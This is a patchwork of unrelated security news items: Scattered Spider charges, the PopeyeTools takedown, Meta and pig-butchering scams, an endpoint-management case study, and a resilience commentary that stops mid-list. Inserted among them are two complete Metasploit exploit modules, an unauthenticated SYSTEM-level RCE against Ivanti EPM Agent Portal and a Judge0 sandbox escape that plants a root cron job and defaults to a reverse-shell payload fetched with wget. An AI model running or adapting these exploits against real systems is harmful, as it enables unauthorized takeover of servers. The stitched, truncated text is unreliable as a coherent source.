Four of the arrested individuals of the cybercriminal gang, known for hacking MGM and Caesars, are American, all of whom could face up to 27 years in prison for the charges against them.

Source: Gregg Vignal via Alamy Stock Photo

Today the Department of Justice (DoJ) unsealed criminal charges against five individuals who belong to the hacking group "Scattered Spider," which is the cybercriminal group known for recruiting young people and carrying out high-profile cyberattacks, including last year's offensives against MGM Resorts and Caesar's Palace in Las Vegas.

The defendants allegedly targeted employees of companies across the United States via phishing messages, using the harvested employee credentials to log in to systems and steal private company data, including intellectual property, and personal identifying information, such as account credentials, names, email addresses, and telephone numbers. The indictment also says the group gained unauthorized access to individuals' cryptocurrency accounts and wallets, and stole millions of dollars of virtual currency.

Four of the defendants are American, ranging from 20 to 25 years old; the eldest, Joel Martin Evans, aka "joeleoli," of Jacksonville, N.C., made his first appearance in court yesterday after being arrested the day before by the FBI. All four of them are charged with one count of conspiracy to commit wire fraud, one count of conspiracy, and one count of aggravated identity theft.

The fifth individual, Tyler Robert Buchanan, 22, is located in the United Kingdom and is facing charges of conspiracy to commit wire fraud, conspiracy, wire fraud, and aggravated identity theft.

"These individuals, and other actors that they have collaborated with, have caused so much pain and financial harm to organizations across North America through their disruptive intrusions," Charles Carmakal, Mandiant Consulting CTO at Google Cloud, wrote in an emailed statement to Dark Reading. "We hope this sends a message to the other actors they collaborate with that they aren't immune to consequences."

If convicted, each of the defendants would face a statutory maximum sentence of 20 years in federal prison for conspiracy to commit wire fraud, up to five years for conspiracy, and two years for aggravated identity theft. Buchanan would face an additional 20 years for the wire fraud count.

Scattered Spider Cybercrime Members Face Prison Time

Consolidating endpoint management boosts cybersecurity while keeping an Oklahoma-based nonprofit focused on community mental health.

Source: Everything Possible via Alamy Stock Photo

At the center of community care, a lifeline for mental health is making a lasting impact — strengthened by technology that ensures security without compromising compassion.

Mental-health center Family and Children's Services (FCS), based in Tulsa, Oklahoma, has helped transform the lives of members of its local community with programs to support their well-being, including child abuse and trauma support, as well as counseling for families and those suffering from substance abuse and addiction. The organization is more than 100 years old, serves more than 150,000 people each year, and offers services in more than 50 schools. It also more than doubled its staff in recent years and now has 1,500 employees who provide a variety of services, many that have moved online since the start of the pandemic.

These changes created a challenge for FCS CIO Brent Harris, who was responsible for protecting a rapidly growing organization with a sprawling IT environment and a boom in the number of endpoints in use. At the beginning of the pandemic lockdown in 2020, FCS distributed approximately 2,000 iPads and other devices to clients so that clinicians could offer teletherapy and telemedicine services. That brought the total number of devices that needed to be managed to around 3,500.

FCS was willing to spend on its core mission — serving the community's mental health needs — so most of its headcount growth was in its clinical staff. But Harris still had to manage with the same number of IT staff to keep costs down. Automation was key to solving this challenge.

"We needed a way to automate, to buy back time instead of trying to solve problems with manpower," Harris says. "We try to solve problems with technology."

**Piloting an Endpoint Management Platform**

The IT staff needed visibility into which software packages were on each device and whether the devices were being patched properly. The legacy system in use didn't give Harris the confidence that his team had that insight.

"Devices were on the network that we didn't see, and software was on someone's device that shouldn't be there that we didn't pick up on," Harris says. "Most of the things we found we found manually."

When FCS deployed Tanium as part of a pilot, the endpoint management platform immediately found devices that the legacy system had missed, Harris says. A tragic incident in the community shortly after illustrated the importance of having endpoint management technology with an accurate view of the environment.

"There was an event in our community where there was an active shooter, not at Family and Children's Services, but at a healthcare facility that a lot of us were familiar with," Harris says. "A lot of people in our agency had worked there in the past or had friends there, and so it really hit near home."

FCS needed a reliable employee notification system to ensure that the healthcare provider was prepared if a similar situation were to unfold. FCS was looking for a guarantee that everyone would receive information — such as employee notifications and software updates — pushed out by the system onto their individual devices.

"We would push it out to 1,000 endpoints and then get a report that said 796 of them received it, and we would have to manually go try to figure out where there were gaps," Harris says. "Tanium is far better at doing that. And in this case, you know, it's really life or death. If that scenario were to ever occur, we need to make sure that 100% of the devices on the network have the agent installed and it's running."

A trial run is an essential part of evaluating which technologies to purchase and deploy because it can help illuminate how well the solution meets the organization's needs, Harris says.

"We were able to do a pilot, and we were pretty convinced within a matter of days and weeks, not months, that this tool was going to be a very important part of our technology stack going forward," he adds.

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

How a Mental Health Nonprofit Secures Endpoints for Compassionate Care

The company gave details for the first time on its approach to combating organized criminal networks behind the devastating scams.

Years into the escalating, multibillion-dollar global crisis of pig butchering scams, social media giant Meta released information for the first time on Thursday about its approach to combating the forced-labor compounds that fuel scam activity on its platforms and across the web.

The company says that for more than two years it has been focused on collaborating with global law enforcement and other tech companies to address the underlying problem of organized crime syndicates driving scam activity in Southeast Asia and the United Arab Emirates.

Meta says that so far this year it has done takedowns of more than 2 million accounts connected to scam compounds in Myanmar, Laos, Cambodia, the Philippines, and the UAE. The company has also been collaborating with external experts, including tech companies, NGOs, and coalitions working to counter online scams. As pig butchering scams generate significant revenue for criminals, though, and spread around the world, Meta notes that it has focused on working with law enforcement to directly track criminal syndicates.

“This is a highly adversarial space where we expect well-resourced and persistent criminal organizations to constantly evolve their tactics (both online and offline) in response to detection and enforcement to try and reconstitute across the internet,” a Meta spokesperson wrote in a statement. The company declined to share how many accounts it had removed prior to this year.

Longtime pig butchering researchers say that Meta has been slow to publicly and directly acknowledge the problem and the role its many platforms play in connecting scammers with potential victims. They emphasize that Meta’s services are far from the only platforms that scammers use to reach victims. But platforms like Facebook and Instagram are recognizable and trusted around the world, so it is inevitable, the researchers say, that scammers will gravitate to them. And Meta has warned its users broadly about investment and romance scams.

“I'm glad that Meta is finally starting to talk about this work, but in the research community, we feel like we've been trying to get their attention for a long time and collaborate with them and they often aren't engaging with us,” says Ronnie Tokazowski, a longtime pig butchering researcher and cofounder of the nonprofit Intelligence for Good.

Since roughly 2020, when the earliest pig butchering scams started to emerge, more than 200,000 people have been trafficked and held in compounds—mostly in Myanmar, Cambodia, and Laos—where they are forced to play the role of an online scammer. If they refuse, the criminals who own the scam compounds, which are typically connected to Chinese organized crime, often beat or torture them. People have been trafficked from more than 60 countries around the world—often after seeing online ads promising them jobs that are too good to be true.

The forced scammers are compelled to send thousands of online messages to potential victims around the world on a daily basis. They are tasked with building relationships, often with the lure of friendship or romance, and eventually persuade their victims to send them money as part of lucrative “investment opportunities.” Individually, victims have lost hundreds of thousands of dollars, while the pig butchering criminal enterprises have collectively conned people out of around $75 billion in recent years.

“These scams can start on dating apps, text message, email, social media, or messaging apps, then ultimately move to scammer-controlled accounts on crypto apps or scam websites masquerading as investment platforms,” Meta writes in its report. “In addition to disrupting scam centers, teams across Meta are constantly rolling out new product features to help protect people on our apps from known scam tactics at scale.”

Pig butchering scams drive toward financial theft, but they start with either one-to-one cold communication between scammers and potential victims or contact that originates from social media groups or other communal forums. For example, Gary Warner, director of intelligence at the cybersecurity firm DarkTower, says that he tracks thousands of Facebook groups dedicated to luring people into cryptocurrency investment scams as well as groups that purport to be community dating resources where scammers are lurking.

Online moderation of scammers is a difficult and longstanding issue for Big Tech. As is the case with many types of inauthentic content, some pig butchering activity can skirt tech company standards—even when they are doing a large number of account takedowns—because the content isn’t explicit enough to meet the criteria for removal.

"So much of what is on platform is clearly the prelude to pig butchering, but Meta says it ‘doesn't violate community standards,’” Warner says.

Meta emphasizes, though, that in addition to its account takedowns and monitoring for scam activity on its platforms, the company is focused on working to directly combat scam compounds using its policies around dangerous organizations and individuals, as well as wider safety policies.

However, the owners of scam compounds have been quick to adopt new technologies into their operations, partly to make their scamming more efficient, but likely also to evade law enforcement and technology clampdowns. In recent months, researchers have spotted pig butchering scammers using artificial intelligence tools, integrating deepfakes into their campaigns, and using malware to expand their capabilities. For example, scammers are now able to easily generate understandable content in many languages using AI translation tools for both the scripts and messages they send potential victims, as well as job advertisements luring prospective workers into scam compounds.

Meta says one recent scam compound that it took action against, which was targeting Japanese and Chinese speakers, followed a tip from OpenAI threat researchers who had spotted the criminal operation using ChatGPT to translate messages that could be used in pig butchering.

A “cluster” of accounts that all appeared to come from Cambodia were spotted translating and generating comments using ChatGPT, OpenAI spokesperson Liz Bourgeois tells WIRED. The comments generated using AI would be shared on social media and appeared to be linked to scam activity. Bourgeois says OpenAI banned the accounts and reported the social media activity to Meta.

Meta Finally Breaks Its Silence on Pig Butchering

The US Department of Justice has taken down PopeyeTools, a major online marketplace used by cybercriminals to sell…

The US Department of Justice has taken down PopeyeTools, a major online marketplace used by cybercriminals to sell stolen credit card information, hacking tools, and more. Learn about the three individuals charged in connection with this operation and how authorities are working to combat cybercrime.

The US Department of Justice (DoJ) has seized and shut down PopeyeTools, a notorious online marketplace that facilitated a wide range of illegal activities, and arrested three alleged administrators of the website.

PopeyeTools was operational since at least 2016, and functioned as a hub for cybercriminals, offering stolen financial data, tools for carrying out fraud, and even tutorials on how to commit these crimes.

The three men charged, Abdul Ghaffar (Pakistan), Abdul Sami (Pakistan), and Javed Mirza (Afghanistan), face up to 10 years in prison each for access device fraud charges levied against them. This move is part of the department’s “all-tools” approach to **combating cybercrime**.

The investigation was conducted by the FBI (Federal Bureau of Investigation). The DoJ’s actions, according to its **press release**, included seizing control of the PopeyeTools website itself, pressing criminal charges against the alleged administrators, and obtaining judicial authorization to seize $283,000 in cryptocurrency from an account controlled by Sami.

PopeyeTools, boasting the motto “We Believe in Quality Not Quantity,” built its reputation by allegedly offering validated stolen credit card information and other tools that facilitated fraudulent transactions. This “quality” came at a price, with individual sets of stolen payment card data and personal information selling for around $30 each.

Its Live Fullz section provided unauthorized payment card data and PII, while other sections included fresh bank logs, leads, scam pages, and guides. To attract members, PopeyeTools promised to refund or replace invalid credit cards and customers could check the validity of bank account, credit card, or debit card numbers offered through the website.

The website catered to a large audience, according to the Justice Department’s press release, selling stolen information to at least 227,000 individuals and generating over $1.7 million in revenue. PopeyeTools even offered customer support, including services to verify the validity of stolen financial data before purchase.

The dismantling of platforms like PopeyeTools is certainly a significant blow to cybercrime activities, demonstrating the DoJ’s commitment to disrupt criminal operations and protect the public from financial fraud.

1.  **WT1SHOP Cybercrime Market Seized**
2.  **Finnish Dark Web Marketplace PIILOPUOTI Seized**
3.  **NetWire Malware Site and Server Seized, Admin Arrested**
4.  **SSNDOB Cybercrime Marketplace Seized in Intl. Operation**
5.  **LockBit Ransomware Gang Domains Seized in Global Operation**

Operation Shipwrecked: US Seizes PopeyeTools Marketplace, Charges 3

Five alleged members of the notorious Scattered Spider hacking group have been charged with executing a sophisticated phishing…

Five alleged members of the notorious Scattered Spider hacking group have been charged with executing a sophisticated phishing scheme that netted them millions of dollars in stolen cryptocurrency and sensitive company data.

The United States govemnet has confirmed arresting and charging five individuals allegedly linked to the **Scattered Spider group** (aka 0ktapus and UNC3944). This notorious hacking collective is accused of masterminding a sophisticated phishing scheme that targeted employees across the United States.

The feds unsealed the charges against the five defendants on November 20, revealing a scheme that relied on mass text message campaigns. According to the US Justice Department’s **press release**, investigators identified four defendants the citizens of the United States and one from the United Kingdom.

*   **Joel Martin Evans (25) – United States**
*   **Noah Michael Urban (20) – United States**
*   **Evans Onyeaka Osiebo (20) – United States**
*   **Tyler Robert Buchanan (22) – United Kingdom**
*   **Ahmed Hossam Eldin Elbadawy (23) – United States**

As previously **reported by Hackread.com**, the gang targeted cryptocurrency users and investers along with the Federal Communications Commission (FCC) employees with phishing messages warning them about account deactivation and linked them to phishing websites that resembled legitimate ones.

The group directed recipients to provide confidential information, including login credentials, and sometimes employees were sent two-factor authentication requests sent to their mobile phones.

Once clicked, the links led to phony websites that mimicked real company login pages. Unsuspecting victims, believing they were accessing official company portals, unintentionally gave away their login credentials.

Using this stolen information, the Scattered Spider crew allegedly gained unauthorized access to corporate computer systems. Once inside, they stole a treasure trove of sensitive data, including intellectual property and proprietary information, as well as personal information from hundreds of thousands of individuals, according to United States Attorney Martin Estrada.

The group also, allegedly, used the stolen credentials they also gained unauthorized access to numerous individuals’ cryptocurrency accounts and wallets, stealing millions of dollars’ worth of virtual currency from victim company intrusions and leaked data sets.

It is worth noting that Scattered Spider was also behind the **cyberattack on MGM Resorts** International in September 2023 in which it collaborated with the ALPHV ransomware group, also known as BlackCat.

“The defendants allegedly preyed on unsuspecting victims in this phishing scheme and used their personal information as a gateway to steal millions in their cryptocurrency accounts,” stated the FBI’s Los Angeles Field Office’s Assistant Director in Charge, Akil Davis.

Authorities say the group operated from September 2021 to April 2023 and caused significant financial losses, not just to targeted companies but also to individual victims who lost their hard-earned cryptocurrency. It is worth noting that cryptocurrency custodian Fortress Trust lost $15 million in customer funds **due to a phishing attack** on third-party vendor, Retool, supposedly launched by the same group. 

If convicted, the defendants face a maximum sentence of 20 years in federal prison for a conspiracy to commit wire fraud case, up to five years for the conspiracy count, and a mandatory two-year consecutive sentence for aggravated identity theft.

**William Wright**, CEO of Closed Door Security, highlighted Scattered Spiders’ sophisticated tactics in targeting MGM Resorts, including tracking an employee on LinkedIn and exploiting IT helpdesk processes to reset a password. This was followed by an MFA fatigue attack, granting system access. Wright emphasized the need for organizations to test their networks and train employees to counter such advanced social engineering threats.

1.  **FBI Disrupts Chinese State-Backed Volt Typhoon’s KV Botnet**
2.  **Goldoon Botnet Hiy D-Link Devices, Exploits 9-Year-Old Flaw**
3.  **LockBit Ransomware Gang Domains Seized in Global Operation**
4.  **Operator of Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**
5.  **4 Arrested as Operation Endgame Disrupts Ransomware Botnets**

US Charges 5 Suspected MGM Hackers from Scattered Spider Gang

This Metasploit module leverages an unauthenticated remote command execution vulnerability in Ivanti's EPM Agent Portal where an RPC client can invoke a method which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM. This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkrequire 'rex/proto/ms_nrtp/client'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::Tcp  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti EPM Agent Portal Command Execution',        'Description' => %q{          This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method          which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.          This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.        },        'Author' => [          'James Horseman', # original poc          'Zach Hanley', # original poc          'Spencer McIntyre' # metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-28324'],          ['URL', 'https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US'],          ['URL', 'https://github.com/horizon3ai/CVE-2023-28324'],        ],        'Platform' => 'win',        'Arch' => ARCH_CMD,        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-07', # Ivanti article created date        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      Opt::RPORT(nil, true, 'The target port is not static. For more info, see this module\'s Verifications Steps in the docs.'),    ])    deregister_options('SSL')  end  def check    cwd = execute_command('echo %cd%', 0)    return CheckCode::Safe('Command execution failed.') unless cwd.to_s =~ /.:\\Windows\\System32/i    CheckCode::Vulnerable("Command execution test succeeded. Current working directory: #{cwd}")  rescue Rex::SocketError => e    CheckCode::Safe("MS-NRTP connection failed. #{e.class}: #{e.message}")  end  def exploit    execute_command(payload.raw)  end  def execute_command(command, result_delay = -1)    if @nrtp_client.nil?      @nrtp_client = client = IAgentPortal.new(        datastore['RHOST'],        datastore['RPORT'],        'LANDeskAgentPortal/LDSM',        context: { 'Msf' => framework, 'MsfExploit' => self }      )      client.connect      vprint_status('Connected to the remote end point')    else      client = @nrtp_client    end    client.do_request(command)    return nil unless result_delay >= 0    sleep result_delay    client.do_get_result  endendclass IAgentPortal < Rex::Proto::MsNrtp::Client  def recv_binary    Msf::Util::DotNetDeserialization::Types::SerializedStream.read(recv)  end  def send_recv_binary(serialized_stream)    send_binary(serialized_stream)    recv_binary  end  def do_request(shell_command)    ss_response = send_recv_binary(ss_request(shell_command))    method_return = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodReturn] }    method_return.record_value.return_value.val.value  end  def do_get_result    ss_response = send_recv_binary(ss_get_result)    ass = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleString] }    return nil unless ass    ass.record_value.members.first.record_value.string.value  end  private  def ss_get_result    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { major_version: 1 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              no_context: 1,              args_inline: 1            },            method_name: 'GetResult',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb',            args: [{ primitive_type_enum: Msf::Util::DotNetDeserialization::Enums::PrimitiveTypeEnum[:String], val: 'localhost' }]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd] }      ]    })  end  def ss_request(shell_command)    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { root_id: 1, header_id: -1, major_version: 1, minor_version: 0 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              method_signature_in_array: 1,              no_context: 1,              args_in_array: 1            },            method_name: 'Request',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb'          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 1, member_count: 2 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 2 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 3 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 2, member_count: 4 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 4, string: 'localhost' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 5 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 6, string: 'cmd.exe' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 7, string: "/c #{shell_command}" } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryArray], record_value: { obj_id: 3, binary_array_type_enum: 0, rank: 1, lengths: [4], type_enum: 3, additional_type_info: 'System.Type' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 9 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryLibrary], record_value: { library_id: 11, library_name: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 5, name: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum', member_count: 1, member_names: ['value__'] },            member_type_info: { binary_type_enums: [0], additional_infos: [8] },            library_id: 11,            member_values: [1]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SystemClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 8, name: 'System.UnitySerializationHolder', member_count: 3, member_names: ['Data', 'UnityType', 'AssemblyName'] },            member_type_info: { binary_type_enums: [1, 0, 1], additional_infos: [8] },            member_values: [{ record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 12, string: 'System.String' } }, 4, { record_type: 6, record_value: { obj_id: 13, string: 'mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' } }]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithId],          record_value: {            obj_id: 9,            metadata_id: 8,            member_values: [              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 14, string: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum' } },              4,              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 15, string: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } }            ]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd], record_value: {} }      ]    })  endend

Ivanti EPM Agent Portal Command Execution

Judge0 does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Judge0 sandbox escape',        'Description' => %q{          Judge0 does not account for symlinks placed inside the sandbox directory,          which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.        },        'Author' => [          'Tanto Security',    # Vulnerability discovery          'Takahiro Yokoyama'  # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-28185'],          ['CVE', '2024-28189'],          ['URL', 'https://tantosec.com/blog/judge0/'],        ],        'Payload' => {          'DisableNops' => true,          # https://github.com/judge0/judge0/blob/ad66f77b131dbbebf2b9ff8083dca9a68680b3e5/app/jobs/isolate_job.rb#L199          'BadChars' => '$&;<>|`'        },        'DefaultOptions' => {          'FETCH_DELETE' => false,          'WfsDelay' => 75        },        'Platform' => %w[linux],        'Targets' => [          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-03-04',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(2358),      ]    )  end  def compile_language_ids    @languages = []    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'languages')    })    return unless res&.code == 200    languages = JSON.parse(res.body)    bash = languages.detect { |row| row['name'].include?('Bash') }    return unless bash    @bash_id = bash['id']    languages.each do |language|      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, "languages/#{language['id']}")      })      lang_info = JSON.parse(res.body)      @languages << language if res&.code == 200 && lang_info['compile_cmd'] && !lang_info['is_archived']    end    return if @languages.empty?    @languages  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'version')    })    return Exploit::CheckCode::Unknown unless res&.code == 200    version = Rex::Version.new(res.body)    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") unless version <= Rex::Version.new('1.13.0')    print_status("Version #{version} detected, which is vulnerable")    return Exploit::CheckCode::Appears if compile_language_ids    Exploit::CheckCode::Unknown  end  def exploit    # Setting the `FETCH_DELETE` option seems to break the payload execution.    # `register_files_for_cleanup` will be used later to cleanup.    fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    compile_language_ids if @languages.nil?    if @languages.empty? && !datastore['ForceExploit']      fail_with(Failure::Unknown, 'Failed to get compile language ids')    end    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'submissions?wait=true'),      'vars_post' => {        'source_code' => 'mv run runbak; ln -s /bin/rm run',        # if cannot get bash id but set ForceExploit to true, use 46        'language_id' => @bash_id || 46 # Bash      }    })    cron_path = '/etc/cron.d/' + rand_text_alpha(8)    print_status("Writing cron job to #{cron_path}")    # use random compile language ids    # if cannot get compile language ids but set ForceExploit to true, use 73 (Rust)    language = !@languages.empty? ? @languages.sample : { id: 73, name: 'Rust' }    print_status("Use language: #{language['id']}, #{language['name']}")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'submissions?wait=true'),      'vars_post' => {        'source_code' => "#test #{rand_text_alphanumeric(5..10)}",        'language_id' => language['id'],        'compiler_options' => "--version\nln -s /bin/rm ./run\n#",        'command_line_arguments' => "x\n"\                                    "cp /bin/rm #{cron_path}\n"\                                    "cp /usr/bin/unlink /bin/rm\n"\                                    "sed -i 's/.*/#/g' #{cron_path}\n"\                                    "sed -i \"2i #{cron_file(cmd)}\" #{cron_path}\n"\                                    "echo 'ok'\n" # not used      }    })    register_files_for_cleanup(cron_path, "/root/#{datastore['FETCH_FILENAME']}")  end  def cron_file(command)    cron_file = 'SHELL=/bin/sh'    cron_file << '\\n'    cron_file << 'PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin'    cron_file << '\\n'    cron_file << "* * * * * root #{command}"    cron_file << '\\n'    cron_file  endend

Judge0 Sandbox Escape

The future of cybersecurity isn't about preventing every breach — it's about learning and growing stronger with each attack.

Akhil Mittal, Senior Manager, Black Duck Software

November 21, 2024

6 Min Read

Source: Brain light via Alamy Stock Photo

COMMENTARY

Despite massive investments in cybersecurity, breaches are still on the rise, and attackers seem to evolve faster than defenses can keep up. The IBM "Cost of a Data Breach Report 2024" estimates the average global breach cost has reached a staggering $4.88 million. But the true damage goes beyond the financial — it's about how quickly your organization can recover and grow stronger. Focusing only on prevention is outdated. It's time to shift the mindset: Every breach is an opportunity to innovate. 

**Turning Breaches Into Opportunities**

Breaches are no longer theoretical. They're happening right now — AI-powered hacks, supply chain vulnerabilities, and social engineering make them inevitable. IBM's report shows that 83% of organizations faced multiple breaches last year. One retail client I worked with had the same mindset: focusing on prevention and detection alone. But after facing multiple breaches, the company flipped its approach — each breach became a learning opportunity. Instead of panic, the company built resilience.

**Strengthening Defenses After Each Breach**

Organizations need to shift from asking, "How do we stop breaches?" to "How do we get stronger from breaches?" Here are five strategies that I've seen make a significant impact: 

**1\. From Breach to Micro-Incident **

Not every breach needs to be a disaster. By treating breaches as micro-incidents, you can contain the damage and quickly move forward. With network segmentation and behavioral analytics, threats can be isolated and stopped from spreading. One financial client cut its recovery time by 50% by adopting self-isolating networks. When suspicious activity was detected, the network kicked into action, isolating the threat and stopping its spread. 

**2\. Stress Test Daily **

Running breach simulations once or twice a year is no longer enough. Leading organizations are stress-testing their defenses daily. This goes beyond testing — it's about actively rehearsing for real-world scenarios, ensuring your teams are battle-ready. Think of it like chaos engineering: You aren't just hoping for the best. You're deliberately looking for weaknesses so you can fix them before attackers find them. This approach helped another client find multiple weak points that were missed in its regular annual penetration tests. 

**3\. Minimize Human Intervention **

When a breach hits, speed is everything. Self-healing systems powered by AI automatically isolate compromised systems and begin repairs without the need for human intervention. One of my e-commerce clients cut its recovery time in half with self-healing technology. Its teams could stop putting out fires and focus on strategic long-term improvements. 

**4\. Adaptive Defense **

Every breach is an opportunity to learn and improve. One of the financial clients created a feedback loop that used AI-powered systems to analyze each breach. Machine learning models adapted defenses, spotting patterns in the attacks, adjusting firewall rules, and fine-tuning detection algorithms. Gartner predicts that by 2026, 30% of enterprises will automate more than half of their network activities, using AI to detect and respond to threats in minutes. 

**5\. Collective Defense **

No one fights cyber threats alone. A healthcare consortium I know began sharing real-time threat intelligence with other organizations. This collective defense approach helped it detect and stop attacks faster. Participating in networks like Information Sharing and Analysis Centers (ISACs) or using platforms like MITRE ATT&CK can boost defenses across industries by pooling insights and data. 

**Cybersecurity as a Competitive Advantage**

Resilience is the new competitive advantage. You can't prevent every breach, but how quickly you respond is what sets you apart. Accenture found that 87% of consumers trust companies that handle breaches with transparency and resilience. It's not the breach itself that builds trust, of course — it's how you respond. 

In industries like finance, healthcare, and technology, resilience not only helps you recover but also fosters customer loyalty. As cyber threats become more global, regulations like GDPR in Europe demand fast, transparent responses. In the Asia-Pacific region, rapid digital transformation is creating new attack surfaces. Wherever your business operates, resilience is key to success.

**Actionable Steps for CISOs**

Here's how chief information security officers (CISOs) can turn breaches into growth opportunities: 

